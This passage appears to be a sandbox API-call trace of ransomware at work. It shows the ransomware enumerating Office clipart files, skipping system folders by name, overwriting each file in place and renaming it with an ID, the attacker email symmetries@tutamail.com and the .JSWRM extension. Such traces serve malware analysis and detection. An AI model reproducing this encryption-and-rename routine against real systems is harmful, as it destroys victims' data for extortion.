12 [0095.177] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH03014_.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH03014_.GIF", lpUsedDefaultChar=0x0) returned 12 [0095.177] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0095.177] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0095.177] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0095.177] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0095.177] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0095.177] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0095.177] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03014_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph03014_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0095.178] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=18898) returned 1 [0095.178] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.178] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x49d0) returned 0x24d210 [0095.178] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x49d0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x49d0, lpOverlapped=0x0) returned 1 [0095.180] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.180] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x49d0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x49d0, lpOverlapped=0x0) returned 1 [0095.181] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0095.181] CloseHandle (hObject=0x314) returned 1 [0095.181] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0095.181] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0095.181] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0095.181] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0095.181] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0095.181] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0095.181] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0095.181] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2a0 [0095.181] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2a0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0095.181] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) returned 1 [0095.181] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0095.181] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0095.181] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0095.181] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0095.181] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03014_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph03014_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03014_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph03014_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0095.182] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0095.182] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0095.182] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0095.182] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x102a14ae, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x102a14ae, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x102c771c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x78af, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PH03041I.JPG", cAlternateFileName="")) returned 1 [0095.182] lstrcmpiW (lpString1="PH03041I.JPG", lpString2=".") returned 1 [0095.182] lstrcmpiW (lpString1="PH03041I.JPG", lpString2="..") returned 1 [0095.182] lstrcmpiW (lpString1="PH03041I.JPG", lpString2="...") returned 1 [0095.182] lstrcmpiW (lpString1="PH03041I.JPG", lpString2="windows") returned -1 [0095.182] lstrcmpiW (lpString1="PH03041I.JPG", lpString2="recovery") returned -1 [0095.182] lstrcmpiW (lpString1="PH03041I.JPG", lpString2="perflogs") returned 1 [0095.182] lstrcmpiW (lpString1="PH03041I.JPG", lpString2="documents and settings") returned 1 [0095.182] lstrcmpiW (lpString1="PH03041I.JPG", lpString2="$RECYCLE.BIN") returned 1 [0095.182] lstrcmpiW (lpString1="PH03041I.JPG", lpString2="system volume information") returned -1 [0095.182] lstrcmpiW (lpString1="PH03041I.JPG", lpString2="msocache") returned 1 [0095.182] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0095.182] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH03041I.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.182] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH03041I.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH03041I.JPG", lpUsedDefaultChar=0x0) returned 12 [0095.182] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0095.182] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0095.182] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH03041I.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.182] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH03041I.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH03041I.JPG", lpUsedDefaultChar=0x0) returned 12 [0095.182] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0095.182] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0095.183] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0095.183] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0095.183] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0095.183] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0095.183] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03041I.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph03041i.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0095.183] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=30895) returned 1 [0095.183] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.183] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x78a0) returned 0x24d210 [0095.183] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x78a0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x78a0, lpOverlapped=0x0) returned 1 [0095.188] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.188] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x78a0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x78a0, lpOverlapped=0x0) returned 1 [0095.188] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0095.189] CloseHandle (hObject=0x314) returned 1 [0095.189] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0095.189] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0095.189] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0095.189] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0095.189] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0095.189] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0095.189] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0095.189] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0095.189] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0095.189] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0095.189] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0095.189] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0095.189] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0095.189] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0095.189] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03041I.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph03041i.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03041I.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph03041i.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0095.190] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0095.190] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0095.190] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0095.190] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x102a14ae, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x102a14ae, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x102a14ae, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x7450, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PH03143I.JPG", cAlternateFileName="")) returned 1 [0095.190] lstrcmpiW (lpString1="PH03143I.JPG", lpString2=".") returned 1 [0095.190] lstrcmpiW (lpString1="PH03143I.JPG", lpString2="..") returned 1 [0095.190] lstrcmpiW (lpString1="PH03143I.JPG", lpString2="...") returned 1 [0095.190] lstrcmpiW (lpString1="PH03143I.JPG", lpString2="windows") returned -1 [0095.190] lstrcmpiW (lpString1="PH03143I.JPG", lpString2="recovery") returned -1 [0095.190] lstrcmpiW (lpString1="PH03143I.JPG", lpString2="perflogs") returned 1 [0095.190] lstrcmpiW (lpString1="PH03143I.JPG", lpString2="documents and settings") returned 1 [0095.191] lstrcmpiW (lpString1="PH03143I.JPG", lpString2="$RECYCLE.BIN") returned 1 [0095.191] lstrcmpiW (lpString1="PH03143I.JPG", lpString2="system volume information") returned -1 [0095.191] lstrcmpiW (lpString1="PH03143I.JPG", lpString2="msocache") returned 1 [0095.191] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0095.191] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH03143I.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.191] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH03143I.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH03143I.JPG", lpUsedDefaultChar=0x0) returned 12 [0095.191] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0095.191] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0095.191] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH03143I.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.191] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH03143I.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH03143I.JPG", lpUsedDefaultChar=0x0) returned 12 [0095.191] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0095.191] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0095.191] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0095.191] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0095.191] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0095.191] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0095.191] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03143I.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph03143i.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0095.192] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=29776) returned 1 [0095.192] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.192] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7450) returned 0x24d210 [0095.192] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x7450, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x7450, lpOverlapped=0x0) returned 1 [0095.201] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.201] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x7450, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x7450, lpOverlapped=0x0) returned 1 [0095.202] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0095.202] CloseHandle (hObject=0x314) returned 1 [0095.202] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0095.202] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0095.202] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0095.202] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0095.203] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0095.203] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0095.203] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0095.203] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0095.203] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0095.203] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0095.203] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0095.203] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0095.203] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0095.203] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0095.203] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03143I.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph03143i.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03143I.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph03143i.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0095.204] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0095.204] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0095.204] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0095.204] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x102c771c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x102c771c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x102c771c, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa343, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="PH03205I.JPG", cAlternateFileName="")) returned 1 [0095.204] lstrcmpiW (lpString1="PH03205I.JPG", lpString2=".") returned 1 [0095.204] lstrcmpiW (lpString1="PH03205I.JPG", lpString2="..") returned 1 [0095.204] lstrcmpiW (lpString1="PH03205I.JPG", lpString2="...") returned 1 [0095.204] lstrcmpiW (lpString1="PH03205I.JPG", lpString2="windows") returned -1 [0095.204] lstrcmpiW (lpString1="PH03205I.JPG", lpString2="recovery") returned -1 [0095.204] lstrcmpiW (lpString1="PH03205I.JPG", lpString2="perflogs") returned 1 [0095.204] lstrcmpiW (lpString1="PH03205I.JPG", lpString2="documents and settings") returned 1 [0095.204] lstrcmpiW (lpString1="PH03205I.JPG", lpString2="$RECYCLE.BIN") returned 1 [0095.204] lstrcmpiW (lpString1="PH03205I.JPG", lpString2="system volume information") returned -1 [0095.204] lstrcmpiW (lpString1="PH03205I.JPG", lpString2="msocache") returned 1 [0095.204] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0095.204] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH03205I.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.204] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH03205I.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH03205I.JPG", lpUsedDefaultChar=0x0) returned 12 [0095.204] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0095.204] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0095.204] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH03205I.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0095.204] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PH03205I.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PH03205I.JPG", lpUsedDefaultChar=0x0) returned 12 [0095.204] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0095.204] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0095.204] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0095.204] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0095.204] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0095.204] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0095.204] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PH03205I.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\ph03205i.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0095.205] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=41795) returned 1 [0095.205] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0095.205] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa340) returned 0x24d210 [0095.206] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0xa340, 